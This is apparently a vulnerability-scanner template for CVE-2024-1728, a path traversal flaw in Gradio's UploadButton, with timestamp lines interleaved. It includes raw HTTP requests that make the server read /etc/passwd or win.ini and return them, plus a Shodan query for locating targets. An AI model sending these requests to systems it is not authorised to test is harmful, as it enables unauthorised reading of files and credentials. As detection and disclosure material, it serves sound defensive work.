2024-06-15 12:36:40 +00:00
id : CVE-2024-1728
info :
2024-06-16 00:36:45 +00:00
name : Gradio > 4.19.1 UploadButton - Path Traversal
2024-06-15 12:36:40 +00:00
author : isacaya
severity : high
description : |
2024-06-16 00:36:45 +00:00
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
2024-06-15 12:36:40 +00:00
impact : |
2024-06-16 00:36:45 +00:00
Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
2024-06-15 12:36:40 +00:00
remediation : |
Update to version 4.19.2.
reference :
- https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
- https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
2024-06-16 11:23:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-1728
2024-06-15 12:36:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2024-1728
2024-06-16 00:36:45 +00:00
cwe-id : CWE-22
epss-score : 0.00044
epss-percentile : 0.10164
2024-06-15 12:36:40 +00:00
metadata :
2024-06-16 11:23:22 +00:00
max-request : 5
verified : true
2024-06-16 00:36:45 +00:00
vendor : gradio
product : gradio
shodan-query : html:"__gradio_mode__"
tags : cve,cve2024,lfi,gradio,intrusive
2024-06-15 12:36:40 +00:00
http :
- raw :
- |
POST /queue/join? HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2024-06-16 11:23:22 +00:00
{"data" : [ [ {"path" : "{{path}}" , "url" : "{{BaseURL}}/file=/help" , "orig_name" : "CHANGELOG.md" , "size" : 3549 , "mime_type" : "text/markdown" }] ] , "event_data" : null , "fn_index" : 0 , "trigger_id" : 2 , "session_hash" : "{{randstr}}" }
2024-06-15 12:36:40 +00:00
- |
GET /queue/data?session_hash={{randstr}} HTTP/1.1
Host : {{Hostname}}
- |
2024-06-16 11:23:22 +00:00
GET /file={{extracted_path}} HTTP/1.1
2024-06-15 12:36:40 +00:00
Host : {{Hostname}}
extractors :
- type : regex
2024-06-16 11:23:22 +00:00
name : extracted_path
2024-06-15 12:36:40 +00:00
regex :
- "/tmp/gradio/.*/passwd"
2024-06-16 00:36:45 +00:00
- "C:.*\\win\\.ini"
2024-06-16 11:23:22 +00:00
internal : true
2024-06-15 12:36:40 +00:00
payloads :
path :
- /etc/passwd
2024-06-16 00:36:45 +00:00
- /windows/win.ini
stop-at-first-match : true
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition : or
- type : status
status :
- 200